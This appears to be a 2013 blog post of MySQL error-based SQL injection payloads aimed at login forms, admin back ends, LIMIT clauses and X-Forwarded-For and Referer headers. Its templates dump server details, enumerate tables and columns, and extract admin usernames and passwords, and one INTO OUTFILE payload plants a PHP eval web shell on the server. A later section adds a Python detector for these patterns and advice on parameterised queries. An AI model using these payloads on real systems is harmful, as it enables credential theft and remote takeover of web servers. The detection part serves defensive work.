
Login-form injection, admin back-end injection, LIMIT injection, X-Forwarded-For injection, Referer injection: constructing the MySQL statements

2013-02-02 13:55
Statement template:

and(select 1 from(select count(*),concat((select concat(<injected expression>) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

Dumping some information about the site:

and (select 1 from(select count(*),concat((select concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a)>0


Functions and tables useful for dumping data:

system_user(): system user name

user(): user name

current_user: current user name

session_user(): user name of the database connection

database(): database name

version(): MySQL version

load_file(): MySQL function that reads a local file

@@datadir: database data directory

@@basedir: MySQL installation path

@@version_compile_os: operating system

information_schema.schemata: table of database names
information_schema.tables: table of table names
information_schema.columns: table of column names

'and(select 1 from(select count(*),concat((select concat(<function 1>,0x20,<function 2>,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

2. Dumping table names

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of database name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of database name> limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of database name> limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

.......

3. Dumping column names

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of table name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of table name> limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of table name> limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

........

4. Dumping usernames and passwords

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

........

' or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<?php eval($_POST[safe])?>') #
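
Every statement above shares one skeleton (count(*) with floor(rand(0)*2) under a GROUP BY, usually over information_schema), so it can be flagged in logged request fields such as X-Forwarded-For, Referer and the login body. The following detector is an added example, not part of the original post; the field names, signature labels and sample requests are constructed for illustration.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Signatures derived from the statement shapes listed on this page.
SIGNATURES = {
    "duplicate-key error leak": re.compile(
        r"count\s*\(\s*\*\s*\).*floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*group\s+by"),
    "schema enumeration": re.compile(r"information_schema\s*\.\s*(schemata|tables|columns)"),
    "server file write": re.compile(r"into\s+(outfile|dumpfile)"),
    "server file read": re.compile(r"load_file\s*\("),
}

def normalize(value: str) -> str:
    """URL-decode twice, drop backticks and /* */ comments, collapse whitespace, lowercase."""
    for _ in range(2):
        value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value.replace("`", ""), flags=re.S)
    return re.sub(r"\s+", " ", value).lower()

def scan(record: dict) -> list:
    """Return sorted (field, signature) pairs for every logged field that matches."""
    hits = []
    for field, value in record.items():
        text = normalize(str(value))
        hits += [(field, name) for name, rx in SIGNATURES.items() if rx.search(text)]
    return sorted(hits)

# Constructed sample requests; the SQL text is a shortened form of the page's own statement.
PAGE_STMT = ("' and (select 1 from(select count(*),concat((select concat(0x3a,database()) "
             "from `information_schema`.tables limit 0,1),floor(rand(0)*2))x "
             "from `information_schema`.tables group by x)a)>0 and '")
SAMPLES = [
    {"x_forwarded_for": "203.0.113.7", "referer": "https://shop.example/login", "body": "user=alice"},
    {"x_forwarded_for": "203.0.113.7" + PAGE_STMT, "referer": "-", "body": "user=alice"},
    {"x_forwarded_for": "198.51.100.4", "referer": "-", "body": "user=" + quote_plus(PAGE_STMT)},
    {"x_forwarded_for": "198.51.100.4", "referer": "x' INTO OUTFILE 'D:/sub/jw/safe1.php' #", "body": ""},
]

if __name__ == "__main__":
    for i, rec in enumerate(SAMPLES):
        print(i, scan(rec) or "clean")
```

These statements only return data when the application echoes the MySQL duplicate-key error to the client and builds its query by string concatenation, so bound parameters for header-derived values and generic error pages remove the channel; the scan is a logging backstop.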